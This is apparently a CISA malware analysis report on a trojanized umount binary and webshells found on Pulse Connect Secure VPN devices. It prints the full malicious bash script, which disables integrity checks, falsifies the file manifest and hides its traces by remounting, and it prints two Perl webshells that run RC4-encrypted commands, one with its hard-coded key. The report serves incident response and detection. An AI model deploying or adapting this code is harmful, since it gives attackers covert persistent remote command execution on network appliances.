Analysis Report

MAR-10337580-1.v1: Pulse Connect Secure

Last Revised
Alert Code
AR21-202J

Summary

body#cma-body { font-family: Franklin Gothic Medium, Franklin Gothic, ITC Franklin Gothic, Arial, sans-serif; font-size: 15px; } table#cma-table { width: 900px; margin: 2px; table-layout: fixed; border-collapse: collapse; } div#cma-exercise { width: 900px; height: 30px; text-align: center; line-height: 30px; font-weight: bold; font-size: 18px; } div.cma-header { text-align: center; margin-bottom: 40px; } div.cma-footer { text-align: center; margin-top: 20px; } h2.cma-tlp { background-color: #000; color: #ffffff; width: 180px; height: 30px; text-align: center; line-height: 30px; font-weight: bold; font-size: 18px; float: right; } span.cma-fouo { line-height: 30px; font-weight: bold; font-size: 16px; } h3.cma-section-title { font-size: 18px; font-weight: bold; padding: 0 10px; margin-top: 10px; } h4.cma-object-title { font-size: 16px; font-weight: bold; margin-left: 20px; } h5.cma-data-title { padding: 3px 0 3px 10px; margin: 10px 0 0 20px; background-color: #e7eef4; font-size: 15px; } p.cma-text { margin: 5px 0 0 25px !important; word-wrap: break-word !important; } div.cma-section { border-bottom: 5px solid #aaa; margin: 5px 0; padding-bottom: 10px; } div.cma-avoid-page-break { page-break-inside: avoid; } div#cma-summary { page-break-after: always; } div#cma-faq { page-break-after: always; } table.cma-content { border-collapse: collapse; margin-left: 20px; } table.cma-hashes { table-layout: fixed; width: 880px; } table.cma-hashes td{ width: 780px; word-wrap: break-word; } .cma-left th { text-align: right; vertical-align: top; padding: 3px 8px 3px 20px; background-color: #f0f0f0; border-right: 1px solid #aaa; } .cma-left td { padding-left: 8px; } .cma-color-title th, .cma-color-list th, .cma-color-title-only th { text-align: left; padding: 3px 0 3px 20px; background-color: #f0f0f0; } .cma-color-title td, .cma-color-list td, .cma-color-title-only td { padding: 3px 20px; } .cma-color-title tr:nth-child(odd) { background-color: #f0f0f0; } .cma-color-list tr:nth-child(even) { background-color: #f0f0f0; } td.cma-relationship { max-width: 310px; word-wrap: break-word; } ul.cma-ul { margin: 5px 0 10px 0; } ul.cma-ul li { line-height: 20px; margin-bottom: 5px; word-wrap: break-word; } #cma-survey { font-weight: bold; font-style: italic; } div.cma-banner-container { position: relative; text-align: center; color: white; } img.cma-banner { max-width: 900px; height: auto; } img.cma-nccic-logo { max-height: 60px; width: auto; float: left; margin-top: -15px; } div.cma-report-name { position: absolute; bottom: 32px; left: 12px; font-size: 20px; } div.cma-report-number { position: absolute; bottom: 70px; right: 100px; font-size: 18px; } div.cma-report-date { position: absolute; bottom: 32px; right: 100px; font-size: 18px; } img.cma-thumbnail { max-height: 100px; width: auto; vertical-align: top; } img.cma-screenshot { margin: 10px 0 0 25px; max-width: 800px; height: auto; vertical-align: top; border: 1px solid #000; } div.cma-screenshot-text { margin: 10px 0 0 25px; } .cma-break-word { word-wrap: break-word; } .cma-tag { border-radius: 5px; padding: 1px 10px; margin-right: 10px; } .cma-tag-info { background: #f0f0f0; } .cma-tag-warning { background: #ffdead; }

Malware Analysis Report
10337580.r1.v1
2021-07-14

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received four files for analysis. One of the files is a modified version of the Unix umount application. It is designed to "hook" the umount functionality of a compromised Unix device. The added functionality provided via this umount "hook" makes several system modifications which provides a remote operator persistent command and control (C2) access to a compromised Pulse Secure device. The remaining files are modified by the umount "hook." This analysis is derived from malicious files found on Pulse Connect Secure devices.



For a downloadable copy of IOCs, see: MAR-10337580-1.v1.WHITE.stix.

Submitted Files (4)

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928 (umount)

5fbdc77bfce54b023a82f04cbe9b1c891d93f63cd782f1875111f0bbc79ca6f5 (libdsplibs.so)

6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475 (sdp_mobile_login.cgi)

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1 (rdpreauth.cgi)

Findings

4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928

Details
Name umount
Size 53836 bytes
Type data
MD5 53a3bce53a360a8614337ac52672cd20
SHA1 4991f7ffbb16128fafc1c6d476a5793f4dc2554a
SHA256 4ebb25ef9621c44cdb52630e44bcd1b5a848c0c56f01fa759863d50166bb0928
SHA512 6ed95c5d452ee26bcc8b945aafb17807d1db2d6b3b46958435a02619c6cddf1b5a017a36d4e022c6e9ae57d588d29f1eac95c25496834cab86564c1f288491fe
ssdeep 768:EAkWEZfTRlHCc6DZ7z1K1q0C+i6d81CEdObeDE+sJeRbtkzuBe5Ri3XJCEJ:QWQtXkZ9K00C+iQVeQeRxOAkEJ
Entropy 6.131720
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a malicious replacement for the Unix umount binary. The modified umount application contains a bash script with an appended ELF binary. When the system attempts to perform an unmount to disconnect a device, the "main" portion of this script will perform several system modifications to the Pulse Secure device before extracting the appended ELF binary, writing it to disk, marking it executable, and using it to actually perform the umount task. This application acts as a "hook" to the compromised device's unmount task. The system modifications performed during this "hook" are ultimately designed to provide a hacker remote C2 capabilities over a compromised Pulse Secure device.



The full malicious script contained within this application is illustrated below. After this full illustration is a summary explanation of the primary pieces of this full malicious script.



--Begin Full Malicious Script--



##sstart

#!/bin/bash

normal_um()

{

   /bin/cp /bin/umount /bin/umount_re

   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re

   /bin/sed -i '1d' /bin/umount_re

   /bin/sed -i 's/^#//' /bin/umount_re

   /bin/chmod u+x /bin/umount_re

   /bin/umount_re $*

   /bin/rm -f /bin/umount_re

   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1

}



patch_manifest()

{

   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi"

   OPENSSL="/tmp/data/root/home/bin/openssl"

   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //'`

   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"

   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest`

   if [ -n "$ori" ]; then

    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest

    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest

   fi



   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh

   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh

}





patch_cgi()

{

   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount

   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount

   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/rm -f tmp1

   /bin/rm -f tmp2

}



patch_libdsp()

{

   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so

   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh

}



patch_umount()

{

   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount

   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount

   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount

   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount

   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp

   /bin/rm -f /tmp/data/root/bin/xx

}









waitweb()

{

   trap '' HUP >/dev/null 2>&1

   st=1

   while [ $st -lt 2 ] ; do

       ps -fA|grep /home/bin/web |grep -v grep > /dev/null

       if [ $? -eq 0 ]; then

           sleep 3

           /bin/mount -o remount,rw /dev/root / >/dev/null 2>&1

           st=2

           /bin/mount -o remount,ro /dev/root / > /dev/null 2>&1

       else

           sleep 2

       fi

   done

}



/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1

if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then

   patch_cgi

   patch_manifest

   patch_umount

   patch_libdsp

   normal_um $*

else

   normal_um $*

fi



###cgistart1

#use Crypt::RC4;

#use MIME::Base64 ();

###cgiend1



###cgistart2

#my $request_method=$ENV{'REQUEST_METHOD'};

#if ($request_method eq "POST") {

#    my $x_key = $ENV{'HTTP_X_KEY'};

#    if ($x_key eq "zzdibweoQxffnDEi2UKacJlEekplJ7uwrt") {

#        my $x_cmd = $ENV{'HTTP_X_CMD'};

#        my $x_cnt = $ENV{'HTTP_X_CNT'};

#        $x_cmd = MIME::Base64::decode($x_cmd);

#        $x_cmd = RC4($x_cnt, $x_cmd);

#        my $res;

#        my $re=popen(*DUMP, $x_cmd, "r");

#        while(<DUMP>){

#            $res .= $_;

#        }

#        close(*DUMP);

#        print "Content-type:text/html\n\n";

#        print MIME::Base64::encode(RC4($x_cnt, $res));

#        exit(0);

#    }

#    else {

#        exit(0);

#    }

#}

###cgiend2



##eend



--End Full Malicious Script--



The function illustrated below is designed to make a small modification to the Pulse Secure system file named libdsplibs.so. This function will change all occurrences of the string "ForceCommand" in the libdsplibs.so binary to the string "#orceCommand". The function below will also remove the string "verifyFiles" from the Pulse Secure system file named check_integrity.sh.



--Begin libdsplibs.so Modification Function--



patch_libdsp()

{

   /bin/sed -i 's/ForceCommand/#orceCommand/g' /tmp/data/root/home/lib/libdsplibs.so

   /bin/sed -i '/local line c file sha m/,/exit 1/s/verifyFiles//g' /tmp/data/root/home/bin/check_integrity.sh

}



--End libdsplibs.so Modification Function--



The function illustrated below is designed to modify the Pulse Secure system files named manifest and check_integrity.sh. As illustrated, this function hashes the new version of the script named sdp_mobile_login.cgi, which now contains a patched in webshell. The function then counts the number of times the string "sdp_mobile_login.cgi" is found in the Pulse Secure manifest file. The malware then replaces this "sdp_mobile_login.cgi" string with the full path of the patched version, and its corresponding SHA256 value within the manifest file. The replacement string for the current "sdp_mobile_login.cgi" strings will appear similar to the following: "/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi 6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475 b".



The function then removes the strings "verify 1" and "err Signature" from the Pulse Secure system file check_integrity.sh. It appears the modifications may be required for the Pulse Secure system to allow the execution of the hacker-modified version of sdp_mobile_login.cgi.



Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.



--Begin manifest and check_integrity.sh Modification Function--



patch_manifest()

{

   file="/tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi” //*CISA: Assign full path to variable file

   OPENSSL="/tmp/data/root/home/bin/openssl".

   h=`$OPENSSL dgst -sha256 $file 2>/dev/null | sed -e 's/^[^ ]*= //‘` //*CISA: SHA256 hash file.

   bkh="/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi "$h" b"         //*CISA: Build variable containing full file name and SHA256.

   ori=`sed -n "/sdp_mobile_login.cgi/=" /tmp/data/root/home/etc/manifest/manifest` //*CISA: Count number of sdp_mobile_login.cgi occurrences.

   if [ -n "$ori" ]; then                

    /bin/sed -i "$ori"a\\"$bkh" /tmp/data/root/home/etc/manifest/manifest //*CISA: Replace with full path of hacked sdp_mobile_login.cgi file with hash value.

    /bin/sed -i "$ori"d /tmp/data/root/home/etc/manifest/manifest

   fi

   sed -i '/verify 1/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "verify 1" string from file.

   sed -i '/err Signature/d' /tmp/data/root/home/bin/check_integrity.sh //*CISA: Remove "err Signature" string from file.

}



--End manifest and check_integrity.sh Modification Function--



The script modifies the Pulse Secure system file named sdp_mobile_login.cgi by adding data to it from a file contained on disk named tmp2. The code utilized to modify sdb_mobile_login.cgi is illustrated below. Analysis of the modified sdb_mobile_login.cgi indicates this modification adds a webshell to the Pulse Secure applications which allows an operator to remotely issue commands to a compromised device. This patched-in webshell is detailed within the description of the file sdp_mobile_login.cgi, included within this document. Notably, the function below also modifies the /bin/umount application by adding data to it contained in the files tmp1 and tmp2. After the modifications of umount and sdp_mobile_login.cgi, the function deletes the files tmp1 and tmp2. The original files tmp1 and tmp2 were not available for analysis.



--Begin sdb_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--



patch_cgi()

{

   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w tmp1' /bin/umount

   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w tmp2' /bin/umount

   /bin/sed -i '/^use DSSessionParams/r tmp1' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/^sub main/r tmp2' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/sed -i '/\#\#cgi/d' /tmp/data/root/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi

   /bin/rm -f tmp1

   /bin/rm -f tmp2

}



--End sdb_mobile_login.cgi and umount Modification Code (Using tmp1 and tmp2)--



The malicious function illustrated below is designed to extract the ELF binary from the current (hacker modified) umount application, and run it as a standalone application to actually perform the umount function for the operating system. The function extracts the embedded ELF, writes it out to disk as /bin/umount_re, and sets it to executable via the system command /bin/chmod u+x /bin/umount_re. The function then executes the umount_re application and deletes it from disk. The final command in the function mounts /dev/root as read only. The remounting of /dev/root with read only permissions is likely a method to hide this activity from a system administrator, as it may draw the attention of system analysts that /dev/root is mounted with read and write permissions.



--Begin normal_um() Function--



normal_um()

{

   /bin/cp /bin/umount /bin/umount_re

   /bin/sed -i '/\#\#sstart/,/\#\#eend/d' /bin/umount_re

   /bin/sed -i '1d' /bin/umount_re

   /bin/sed -i 's/^#//' /bin/umount_re

   /bin/chmod u+x /bin/umount_re

   /bin/umount_re $*

   /bin/rm -f /bin/umount_re

   /bin/mount -o remount,ro /dev/root / >/dev/null 2>&1

}



--End normal_um() Function--



The function below modifies the system application /bin/umount using the data contained in a file named /tmp/data/root/bin/xx. The function then deletes the file named /tmp/data/root/bin/xx.



--Begin patch_umount Function--



patch_umount()

{

   /bin/sed -i '/\#\#sstart/,/\#\#eend/w /tmp/data/root/bin/xx' /bin/umount

   /bin/sed -i 's/^/#/' /tmp/data/root/bin/umount

   /bin/sed -i '1i \ ' /tmp/data/root/bin/umount

   /bin/sed -i '1r /tmp/data/root/bin/xx' /tmp/data/root/bin/umount

   /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp

   /bin/rm -f /tmp/data/root/bin/xx

}



--End patch_umount Function--



Illustrated below, is the "main" portion of this malicious application with comments added by our team to illustrate the purpose of this file.



Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.



--Begin Main Script--



/bin/mount -o remount,rw /dev/root / >/dev/null 2>&1 //*CISA: Mount the /dev/root partition with read and write permissions.

if [ $# == 2 ] && [ $1 == "-r" ] && [ $2 == "/tmp/data/root" ] ; then

   patch_cgi //*CISA: Patch the applications /bin/umount and sdp_mobile_login.cgi with malicious code (allowing remote access to device).

   patch_manifest //*CISA: Patch manifest and check_integrity.sh scripts so they will not block the now patched app sdp_mobile_login.cgi.

   patch_umount. //*CISA: Patches the /bin/umount file with data from /tmp/data/root/bin/xx.

   patch_libdsp //*CISA: Patches Pulse Secure system library /tmp/data/root/home/lib/libdsplibs.so.

   normal_um $* //*CISA: Extracts ELF from patched umount application, executes it, deletes it. Then remounts /dev/root as read only.

else

   normal_um $*

fi



--End Main Script--

6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475

Details
Name sdp_mobile_login.cgi
Size 2472 bytes
Type Perl script text executable
MD5 1e5e454420c3a70faff883e0e9a511b7
SHA1 05bd06d3b7fc73ce9210ffa9ff3e0a0efb3a3a78
SHA256 6092a24ca3853fb351989ee1aa2eca604fc438afc1e64df3ede10ffda577d475
SHA512 b055b89983563d3b631167ccff7f6f27f1c20d62f131d3757b600b9848fa7a88d55c3aa55ee20df10aee3739335c31f3a458d22d8299c1e5eb225772bf2d7233
ssdeep 48:Ei7LYl211hm+zZlSh+EtHk1tv6v1ZKOp2wLuH9ixRt6oClS1KCQAnU2c82QjanRS:EiPYG7zZlS0aESIw4evoSUCzUqyA
Entropy 5.153682
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script that has been modified by a malicious actor. The modification made to the script is illustrated below. It is believed the modification to this Pulse Secure script was made by the application named umount detailed within this document.



The main function of this application has been hooked to check for the following incoming POST parameters: HTTP_X_KEY, HTTP_X_CMD, HTTP_X_CNT. The data passed in with the HTTP_X_CMD parameter will be base64 decoded and RC4 decrypted using the key data passed in via the HTTP_X_CNT parameter. The now decrypted HTTP_X_CMD parameter data will then be executed on the target system using the popen() function and the command's return value will be RC4 encrypted -- using the RC4 key passed via the HTTP_X_CNT parameter -- and base64 encoded before being returned to the remote operator via the web application using a print statement.



Note: The data contained in the provided parameter HTTP_X_KEY must match the hard coded value zzdibweoQxffnDEi2UKacJlEekplJ7uwrt for the webshell code to successfully process the hacker provided command.



Note: The comments in the code below were added by CISA to clarify the functionality of different parts of the malicious code.



--Begin Main Webshell Hook--



$ |= 1;



sub main {

my $request_method=$ENV{'REQUEST_METHOD'};

if ($request_method eq "POST") {

   my $x_key = $ENV{'HTTP_X_KEY'}; //*CISA: Copies out HTTP_X_KEY Parameter.

   if ($x_key eq "zzdibweoQxffnDEi2UKacJlEekplJ7uwrt") { //*CISA: Compares HTTP_X_KEY to hard coded value. Must Match For C2 Session.

       my $x_cmd = $ENV{'HTTP_X_CMD'};    //*CISA: Extract hacker provided command from parameter (HTTP_X_CMD).

       my $x_cnt = $ENV{'HTTP_X_CNT'}; //*CISA: Extract RC4 key from parameter (HTTP_X_CNT).

       $x_cmd = MIME::Base64::decode($x_cmd); //*CISA: Base64 decode command.

       $x_cmd = RC4($x_cnt, $x_cmd); //*CISA: RC4 Decrypt Command.

       my $res;

       my $re=popen(*DUMP, $x_cmd, "r"); //*CISA: Execute command.

       while(<DUMP>){

           $res .= $_;    //*CISA: Build up command response.

       }

       close(*DUMP);

       print "Content-type:text/html\n\n";

       print MIME::Base64::encode(RC4($x_cnt, $res)); //*CISA: Base64 / encrypt and return command response to hacker

       exit(0);

   }

   else {

       exit(0);

   }

}



--End Main Webshell Hook--

5fbdc77bfce54b023a82f04cbe9b1c891d93f63cd782f1875111f0bbc79ca6f5

Details
Name libdsplibs.so
Size 15747828 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV)
MD5 d1993f12d7fa6adfc493afb5327ccbee
SHA1 2c8ec97aaa43648f07ddf7e257cc3faaeacbb3f2
SHA256 5fbdc77bfce54b023a82f04cbe9b1c891d93f63cd782f1875111f0bbc79ca6f5
SHA512 134b45ce345263a466aa6b1a6ecc5653f376adb6d6b120b689fab68fb3369dfd4191c2d4ad98ca0260c086a6c0a494cbdb33f1f6cd9c8ce31548c1e8c1b5c292
ssdeep 393216:QGTidT3bzim/nocRHnZTTcITNFcA0FRA1aJh5CDU+lTE:/8zLvzORA0E1DbRE
Entropy 6.550685
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a legitimate Pulse Secure shared object application that has been modified by the script contained in the file umount, also included within this submission. As screenshots attached to this product indicate, the string ForceCommand in this binary has been modified to #orceCommand in an attempt to change its functionality.

Screenshots

Figure 1 - Direct modification made to libdsplibs.so by the malicious code contained in the application umount. The string ForceCommand has been changed to #orceCommand.

Figure 2 - Direct modification made to libdsplibs.so by the malicious code contained in the application umount. The string ForceCommand has been changed to #orceCommand.

FIgure 3 - Direct modification made to libdsplibs.so by the malicious code contained in the application umount. The string ForceCommand has been changed to #orceCommand.

e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1

Tags

webshell

Details
Name rdpreauth.cgi
Size 1894 bytes
Type Perl script text executable
MD5 e7e2f79ade6f198c5d9707b6f94a9a41
SHA1 0a4a5be7704fa9f1a8c826888060831051767b52
SHA256 e3137135f4ad5ecdc7900a619d7f1b88ba252b963b38ae9a156299cc9bce92a1
SHA512 af5ba0cd5dcc6f2761bce3950c8aa918df9611796da53657790d34d8ea014d6ece27a8fa302ebed9fd235dff2b3ce864ff0c462c3fa0997b65b666107eb3c204
ssdeep 48:E8LYaef1MCZDh7YQkg/3YElOI1P9Y611Zze4+kBkqFogb4mX/yZTOj:EaYH5Z17Yc/3Y6z/3e2CqFHbXvv
Entropy 5.032639
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure system application that has been modified to allow an operator to remotely execute commands on a compromised Pulse Secure device. Its main() function has been hooked with the webshell illustrated below. This webshell is similar in design and functionality to the webshell described in the file sdp_mobile_login.cgi. A primary difference in this webshell is that a static value must be passed in with the HTTP_X_KEY parameter for the webshell to process and execute a provided command.



--Begin Malicious Webshell--



sub main {

   my $request_method=$ENV{'REQUEST_METHOD'};

if ($request_method eq "POST") {    #POST

   my $x_key = $ENV{'HTTP_X_KEY'};

   if ($x_key eq "[REACTED]") {

       my $x_cmd = $ENV{'HTTP_X_CMD'};

       my $x_cnt = $ENV{'HTTP_X_CNT'};

       $x_cmd = MIME::Base64::decode($x_cmd);

       $x_cmd = RC4($x_cnt, $x_cmd);

       my $res;

       my $re=popen(*DUMP, $x_cmd, "r");

       while(<DUMP>){

           $res .= $_;

       }

       close(*DUMP);

       print "Content-type:text/html\n\n";

       print MIME::Base64::encode(RC4($x_cnt, $res));

       exit(0);

   }

}



--End Malicious Webshell--

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Central.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.